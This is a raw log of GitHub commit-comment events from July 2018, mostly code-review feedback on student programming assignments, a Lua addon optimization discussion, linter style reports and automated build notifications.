{"id":"7947614337","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18012/programming-term2"},"payload":{"comment":{"id":29665804,"position":null,"line":null,"path":null,"commit_id":"66d041cce969165208bd5d695f6e5f8740febb20","created_at":"2018-07-11T03:54:28Z","updated_at":"2018-07-11T03:54:28Z","author_association":"NONE","body":"修正お疲れ様です。\r\n結果ですが、ポイント値引きが反映されていないので不正解です。\r\n\r\nで、変数名ですが、役割が分かる方が良いです。下記の様に修正するといいと思います。\r\n・payment：この単語が意味するのは「支払い」ですが、実際には「割引した焼鳥の単価」が代入されています。それを考えると\"chicken_p_off\"とかが良いと思います。\r\n・英単語のスペルですが、ビールは\"beer\"、チキンは\"chicken\"ですね。"}},"created_at":"2018-07-11T03:54:28Z"}
{"id":"7947614742","type":"CommitCommentEvent","actor":{"login":"ShmooDude"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29665805,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-11T03:54:38Z","updated_at":"2018-07-11T03:54:38Z","author_association":"NONE","body":"I think what should be done is the default behavior should use the `PLAYER` filter and scan everything.  The player filter is orders of magnitude less CPU usage than without because it reduces the workload of that by probably 95%+ in raids (otherwise it's loading every buff/debuff by every player in the raid; upto 40 buffs/debuffs per unit).  \r\n\r\nAs far as I know, the only thing currently that uses the any=1 in any of the default scripts is the heroism/bloodlust debuff check.  The newly readded buffs from Mages, Priests and Warriors might need it as well.\r\n\r\nWhat I did on my local copy in addition to a bunch of other optimizations (which some ferals have been using) was:\r\n\r\n`PLAYER` filter on everything except the player themselves (and their pet).\r\n\r\nHere's the LUA version of that change (I didn't do this one in typescript, though I probably will soon if you don't beat me to it).  Probably don't even really need the pet but I don't think it costs much.\r\n\r\n```\r\n            local onMe = (guid == self_playerGUID or OvaleGUID:IsPlayerPet(guid))\r\n            local i = 1\r\n            local filter = \"HELPFUL\"\r\n            if not onMe then\r\n                filter = \"HELPFUL PLAYER\"\r\n            end\r\n            local now = GetTime()\r\n            while true do\r\n                local name, _, icon, count, debuffType, duration, expirationTime, unitCaster, isStealable, _, spellId, _, _, _, value1, value2, value3 = UnitAura(unitId, i, filter)\r\n                if  not name then\r\n                    if filter == \"HELPFUL\" then\r\n                        filter = \"HARMFUL\"\r\n                        i = 1\r\n                    elseif filter == \"HELPFUL PLAYER\" then\r\n                        filter = \"HARMFUL PLAYER\"\r\n                        i = 1\r\n                    else\r\n                        break\r\n```\r\n\r\nOLD:\r\n```\r\n            local i = 1\r\n            local filter = \"HELPFUL\"\r\n            local now = GetTime()\r\n            while true do\r\n                local name, icon, count, debuffType, duration, expirationTime, unitCaster, isStealable, _, spellId, _, _, _, value1, value2, value3 = UnitAura(unitId, i, filter)\r\n                if  not name then\r\n                    if filter == \"HELPFUL\" then\r\n                        filter = \"HARMFUL\"\r\n                        i = 1\r\n                    else\r\n                        break\r\n```"}},"created_at":"2018-07-11T03:54:38Z"}
{"id":"7947617734","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29665811,"position":null,"line":null,"path":null,"commit_id":"37913573ae69c780c5af1228b7df40b31ecf18da","created_at":"2018-07-11T03:55:53Z","updated_at":"2018-07-11T03:55:53Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-11T03:55:53Z"}
{"id":"7947622240","type":"CommitCommentEvent","actor":{"login":"davidolorundare"},"repo":{"name":"davidolorundare/heremaps-experimentation"},"payload":{"comment":{"id":29665814,"position":null,"line":null,"path":null,"commit_id":"7fd38648cd63e218cd4fd6bd3d9eda2c89bdc323","created_at":"2018-07-11T03:57:41Z","updated_at":"2018-07-11T03:57:41Z","author_association":"OWNER","body":"Should have made some more modifications to the map container #1 "}},"created_at":"2018-07-11T03:57:41Z"}
{"id":"7947623554","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29665817,"position":null,"line":null,"path":null,"commit_id":"01af9989de914c5596a5844144836986f7b75208","created_at":"2018-07-11T03:58:14Z","updated_at":"2018-07-11T03:58:14Z","author_association":"NONE","body":"計算過程も追いやすく、適宜コメントも記載されていて、いいコードと思います。\r\n対応ありがとうございます。お疲れ様でした。"}},"created_at":"2018-07-11T03:58:14Z"}
{"id":"7947626332","type":"CommitCommentEvent","actor":{"login":"csepulvedae"},"repo":{"name":"csepulvedae/udemy-heroes"},"payload":{"comment":{"id":29665819,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-11T03:59:23Z","updated_at":"2018-07-11T03:59:23Z","author_association":"OWNER","body":"## Joker\r\nEste es mi villano favorito"}},"created_at":"2018-07-11T03:59:23Z"}
{"id":"7947631969","type":"CommitCommentEvent","actor":{"login":"csepulvedae"},"repo":{"name":"csepulvedae/udemy-heroes"},"payload":{"comment":{"id":29665831,"position":4,"line":8,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-11T04:01:31Z","updated_at":"2018-07-11T04:01:31Z","author_association":"OWNER","body":"#Notas\r\nEntiendo porque agregaste a Deadshot, lo necesitaremos"}},"created_at":"2018-07-11T04:01:31Z"}
{"id":"7947633556","type":"CommitCommentEvent","actor":{"login":"fleminpaul"},"repo":{"name":"fleminpaul/Angular2Tuts"},"payload":{"comment":{"id":29665837,"position":null,"line":null,"path":null,"commit_id":"916726a61bc2111b553c50f5dc4170b1ef907cde","created_at":"2018-07-11T04:02:09Z","updated_at":"2018-07-11T04:02:09Z","author_association":"OWNER","body":"\r\n\r\n\r\n\r\n\r\n\r\ncommit\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-11T04:02:09Z"}
{"id":"7947638379","type":"CommitCommentEvent","actor":{"login":"felirangelp"},"repo":{"name":"felirangelp/stack"},"payload":{"comment":{"id":29665846,"position":null,"line":null,"path":null,"commit_id":"6b0b62c5cc1cb1ee0c9a1b9ec2d76ea96160a89c","created_at":"2018-07-11T04:04:02Z","updated_at":"2018-07-11T04:04:02Z","author_association":"OWNER","body":"Yo tampoco"}},"created_at":"2018-07-11T04:04:02Z"}
{"id":"7947639405","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29665847,"position":6,"line":6,"path":"Palindrome Permutation.js","commit_id":"ff48a5da8924d78764cc11eaee93fe4cf4f5fe82","created_at":"2018-07-11T04:04:29Z","updated_at":"2018-07-11T04:04:29Z","author_association":"NONE","body":"specify `map` or `set` instead of generically naming the variable `hash`.\r\nan even better option would be to name the variable something more descriptive like `charCount`.\r\n\r\nalso not sure what the convention is in javascript, but it seems a bit odd to me that we're defining `hash` as a `const`, but then modifying it later on. maybe `let` is a better option here."}},"created_at":"2018-07-11T04:04:29Z"}
{"id":"7947642739","type":"CommitCommentEvent","actor":{"login":"ShmooDude"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29665849,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-11T04:05:55Z","updated_at":"2018-07-11T04:05:55Z","author_association":"NONE","body":"Just tested and the debuff from Time Warp (and presumably all the other variations) is considered cast by the player and does show on the `PLAYER` filter even if the player didn't cast the Time Warp (I was on my druid), so it may not even be necessary to do a full scan for that.  That probably just leaves the player buffs that are being readded.  Will test those when I get the chance but it's not a huge deal to track all buffs on the player themselves."}},"created_at":"2018-07-11T04:05:55Z"}
{"id":"7947643705","type":"CommitCommentEvent","actor":{"login":"dhinar1991"},"repo":{"name":"dhinar1991/ML-Interview-test"},"payload":{"comment":{"id":29665853,"position":null,"line":null,"path":null,"commit_id":"af22e55607a2c9da912377c4e171b868fc952d34","created_at":"2018-07-11T04:06:20Z","updated_at":"2018-07-11T04:06:20Z","author_association":"OWNER","body":"final_data['purchased'] is uncommented so the final data contains collection of Purchased items by user. It is optional if you want to compare the purchased items and recommended items."}},"created_at":"2018-07-11T04:06:20Z"}
{"id":"7947650519","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29665859,"position":null,"line":null,"path":null,"commit_id":"f07237680247d444b7e79e946e125878a14d601e","created_at":"2018-07-11T04:09:12Z","updated_at":"2018-07-11T04:09:12Z","author_association":"NONE","body":"修正お疲れ様です。\r\nちょっと結果として残念な部分が…\r\nyakitori_w自体に0.2して計算式を変更していない結果、焼鳥が「2割引」でなく「2割(8割引)」の値段になってしまっていますね^^;\r\n\r\n結果としては、paymentを計算する式の右辺のyakitori_wの部分を(1 - yakitori_w)に修正すれば正解します。"}},"created_at":"2018-07-11T04:09:12Z"}
{"id":"7947650960","type":"CommitCommentEvent","actor":{"login":"jamesmchugh8669"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":29665860,"position":null,"line":null,"path":null,"commit_id":"b058c9e11d16ebd118c8ece8d71c5b11008b02c5","created_at":"2018-07-11T04:09:24Z","updated_at":"2018-07-11T04:09:24Z","author_association":"NONE","body":"+python-2.7.14-v2-win10-x64-v141.7z"}},"created_at":"2018-07-11T04:09:24Z"}
{"id":"7947655132","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29665863,"position":27,"line":27,"path":"Palindrome Permutation.js","commit_id":"ff48a5da8924d78764cc11eaee93fe4cf4f5fe82","created_at":"2018-07-11T04:11:10Z","updated_at":"2018-07-11T04:11:10Z","author_association":"NONE","body":"nice tests, including corner cases and expected outcomes.\r\n\r\nin the future, consider adding a description of what each test is testing. each test should test something different. and they should be simple and easy to understand.\r\n\r\nfor example, \r\n```\r\n// 3 odd character counts should return false\r\nconsole.log(isPalindromePermutation(\"kajwhnefjkawnf\"));\r\n```"}},"created_at":"2018-07-11T04:11:10Z"}
{"id":"7947659815","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29665866,"position":null,"line":null,"path":null,"commit_id":"b0333f8cc15f13d11bb3228dcaafefbb26fb5c6e","created_at":"2018-07-11T04:13:11Z","updated_at":"2018-07-11T04:13:11Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-331](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-331).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-331-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-11T04:13:11Z"}
{"id":"7947660507","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/NetLogoR"},"payload":{"comment":{"id":29665868,"position":null,"line":null,"path":null,"commit_id":"bc3a18ff2853838085c6bc1b287c04e74b0f1437","created_at":"2018-07-11T04:13:28Z","updated_at":"2018-07-11T04:13:28Z","author_association":"NONE","body":"[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:64:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L64) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.WolfSheepPredation <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:113:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L113) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationInit <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:185:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L185) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationSave <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:200:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L200) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationPosition <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:220:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L220) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationPopSize <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:243:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationEvent <- function(sim){\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:15:12:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L15) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  function(.Object=\"agentMatrix\", coords, ..., levelsAM) {\n           ^~~~~~~\n```\n[R/agentMatrix-Class-methods.R:16:5:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L16) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    Coords <- TRUE\n    ^~~~~~\n```\n[R/agentMatrix-Class-methods.R:29:7:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L29) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      Coords <- FALSE\n      ^~~~~~\n```\n[R/agentMatrix-Class-methods.R:395:6:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L395) *style:* **Commented code should be removed.**\n```r\n​    #charCols <- match(j, nam)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:396:6:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L396) *style:* **Commented code should be removed.**\n```r\n​    #charCols <- match(nam, j)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:397:34:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L397) *style:* **Commented code should be removed.**\n```r\n​    numCols <- which(!charCols) #colNums[!(colNums %in% charCols)]\n                                 ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:404:8:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L404) *style:* **Commented code should be removed.**\n```r\n​      #numColsJ <- which(colNums %in% numCols)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:409:8:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L409) *style:* **Commented code should be removed.**\n```r\n​      #charColsJ <- which(colNums %in% charCols)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:609:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L609) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​head.agentMatrix <- function(x, n = 6L, ...) {\n^~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:617:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L617) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​tail.agentMatrix <- function(x, n = 6L, ...) {\n^~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:638:36:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L638) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​cbind.agentMatrix <- function(..., deparse.level) {\n                                   ^~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:662:36:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L662) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​rbind.agentMatrix <- function(..., deparse.level = 1) {\n                                   ^~~~~~~~~~~~~\n```\n[R/agentset-functions.R:1537:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentset-functions.R#L1537) *style:* **Lines should not be more than 100 characters.**\n```r\n​        pOverL <- over(pBuffer, SpatialPoints(coords = agents2cAll, proj4string = .projNowhere), returnList = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentset-functions.R:1549:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentset-functions.R#L1549) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       SpatialPoints(coords = agents2@.Data[, c(\"xcor\", \"ycor\"), drop = FALSE], proj4string = .projNowhere),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/patch-functions.R:609:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/patch-functions.R#L609) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @seealso \\url{https://ccl.northwestern.edu/netlogo/docs/dictionary.html#patch-at-heading-and-distance}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plot.R:37:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/plot.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Ras <- world2raster(x)\n  ^~~\n```\n[R/plot.R:53:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/plot.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Ras <- world2raster(x)\n  ^~~\n```\n[R/quickPlot.R:179:39:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/quickPlot.R#L179) *style:* **Commas should always have a space after.**\n```r\n​    grobToPlot@.Data <- toPlot@.Data[,,sGrob@layerName];\n                                      ^\n```\n[R/world-functions.R:517:25:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L517) *style:* **Put spaces around all infix operators.**\n```r\n​          mid <- floor(n/2)\n                       ~^~\n```\n[R/world-functions.R:534:9:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L534) *style:* **Commented code should be removed.**\n```r\n​    #   cat(\"names       :\", paste(ln, collapse=\", \"), \"\\n\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/world-functions.R:538:28:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L538) *style:* **Commas should always have a space after.**\n```r\n​    print(object@.Data[1:4,1:4,])\n                           ^\n```\n[R/world-functions.R:538:32:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L538) *style:* **Commas should always have a space after.**\n```r\n​    print(object@.Data[1:4,1:4,])\n                               ^\n```\n[R/worldNLR-classes-methods.R:340:5:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/worldNLR-classes-methods.R#L340) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    NLwMs <- list(...)\n    ^~~~~\n```\n[tests/testthat/test-plotting.R:6:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/tests/testthat/test-plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  t1_0 <- createTurtles(n = 10, coords = cbind(rep(0, 10), rep(0, 10)))\n  ^~~~\n```"}},"created_at":"2018-07-11T04:13:28Z"}
{"id":"7947661083","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18011/programming-term2"},"payload":{"comment":{"id":29665870,"position":null,"line":null,"path":null,"commit_id":"ff101678e1588fb6a29afbe17b79adf96ca2de8a","created_at":"2018-07-11T04:13:43Z","updated_at":"2018-07-11T04:13:43Z","author_association":"NONE","body":"ひとまず再提出お疲れ様でした。\r\n機能修正した過程を見ているのでOKにしますが、修正前のコードとのconflict(衝突)が起きていますね。\r\n今日の講義後半の方でgitの操作上の問題点を解決しましょうね。"}},"created_at":"2018-07-11T04:13:43Z"}
{"id":"7947661230","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29665872,"position":null,"line":null,"path":null,"commit_id":"83175705b581401deba9f8c297fe024d80c7f0d4","created_at":"2018-07-11T04:13:48Z","updated_at":"2018-07-11T04:13:48Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-40](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-40).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-40-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-11T04:13:48Z"}
{"id":"7947661301","type":"CommitCommentEvent","actor":{"login":"ichihoushi"},"repo":{"name":"ichihoushi/repo"},"payload":{"comment":{"id":29665874,"position":null,"line":null,"path":null,"commit_id":"eb42d294a0838dd47aa58c8e2e01707a16e352bf","created_at":"2018-07-11T04:13:50Z","updated_at":"2018-07-11T04:13:50Z","author_association":"OWNER","body":"aaaaaaa"}},"created_at":"2018-07-11T04:13:50Z"}
{"id":"7947663120","type":"CommitCommentEvent","actor":{"login":"ichihoushi"},"repo":{"name":"ichihoushi/repo"},"payload":{"comment":{"id":29665878,"position":null,"line":null,"path":null,"commit_id":"eb42d294a0838dd47aa58c8e2e01707a16e352bf","created_at":"2018-07-11T04:14:37Z","updated_at":"2018-07-11T04:14:37Z","author_association":"OWNER","body":"bbbbbb"}},"created_at":"2018-07-11T04:14:37Z"}
{"id":"7947663587","type":"CommitCommentEvent","actor":{"login":"kosuke-makita"},"repo":{"name":"taitokita/nico"},"payload":{"comment":{"id":29665879,"position":null,"line":null,"path":null,"commit_id":"9c3244c98d56ae126fb34c407155c05a78fafc78","created_at":"2018-07-11T04:14:51Z","updated_at":"2018-07-11T04:14:51Z","author_association":"COLLABORATOR","body":"cloneしても更新されてないよ\r\n"}},"created_at":"2018-07-11T04:14:51Z"}
{"id":"7947665427","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29665885,"position":27,"line":27,"path":"Palindrome Permutation.js","commit_id":"ff48a5da8924d78764cc11eaee93fe4cf4f5fe82","created_at":"2018-07-11T04:15:39Z","updated_at":"2018-07-11T04:15:39Z","author_association":"NONE","body":"***random or complicated tests can be more distracting than they are helpful"}},"created_at":"2018-07-11T04:15:39Z"}
{"id":"7947668587","type":"CommitCommentEvent","actor":{"login":"mko-io"},"repo":{"name":"openbsd/src"},"payload":{"comment":{"id":29665890,"position":null,"line":null,"path":null,"commit_id":"6891c20edc8e58c76f533c7ee11d883ffe1e4997","created_at":"2018-07-11T04:17:00Z","updated_at":"2018-07-11T04:17:00Z","author_association":"NONE","body":"that's epic"}},"created_at":"2018-07-11T04:17:00Z"}
{"id":"7947678663","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29665900,"position":16,"line":16,"path":"One Away.js","commit_id":"b39031211266429584cbb69189e855a93cfdcc80","created_at":"2018-07-11T04:21:13Z","updated_at":"2018-07-11T04:21:13Z","author_association":"NONE","body":"nice corner case checks"}},"created_at":"2018-07-11T04:21:13Z"}
{"id":"7947698161","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29665924,"position":null,"line":null,"path":null,"commit_id":"94390b5d3f6d8b5e6397d5de20a1781f4527d8dd","created_at":"2018-07-11T04:29:36Z","updated_at":"2018-07-11T04:29:36Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-333](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-333).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-333-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-11T04:29:36Z"}
{"id":"7947701347","type":"CommitCommentEvent","actor":{"login":"JohnMH"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29665933,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-11T04:30:54Z","updated_at":"2018-07-11T04:30:54Z","author_association":"OWNER","body":"@albfan It would require me to install Android development software which is currently absent from my system. That is not something that can be done in 5 seconds."}},"created_at":"2018-07-11T04:30:54Z"}
{"id":"7947701483","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29665934,"position":33,"line":33,"path":"One Away.js","commit_id":"b39031211266429584cbb69189e855a93cfdcc80","created_at":"2018-07-11T04:30:58Z","updated_at":"2018-07-11T04:30:58Z","author_association":"NONE","body":"also this is redundant since we're checking `s1.length > s2.length` twice.\r\n\r\ncould probably do something like:\r\n`const [shorter, longer] = s1.length > s2.length ? [s2, s1] : [s1, s2];`"}},"created_at":"2018-07-11T04:30:58Z"}
{"id":"7947702649","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29665938,"position":null,"line":null,"path":null,"commit_id":"5239120a265d706520ed3651ff3ee7232dafd912","created_at":"2018-07-11T04:31:24Z","updated_at":"2018-07-11T04:31:24Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/fastest-stable-stringify-2.x.50`__ :crossed_fingers: [`renovate/fastest-stable-stringify-2.x`](https://github.com/streamich/nano-css/tree/renovate/fastest-stable-stringify-2.x) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/50) :tada:"}},"created_at":"2018-07-11T04:31:24Z"}
{"id":"7947703100","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29665940,"position":null,"line":null,"path":null,"commit_id":"392a701521add15cd246c4ae7f0a06c0a94eee09","created_at":"2018-07-11T04:31:36Z","updated_at":"2018-07-11T04:31:36Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/libreact-2.x.52`__ :crossed_fingers: [`renovate/libreact-2.x`](https://github.com/streamich/nano-css/tree/renovate/libreact-2.x) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/52) :tada:"}},"created_at":"2018-07-11T04:31:36Z"}
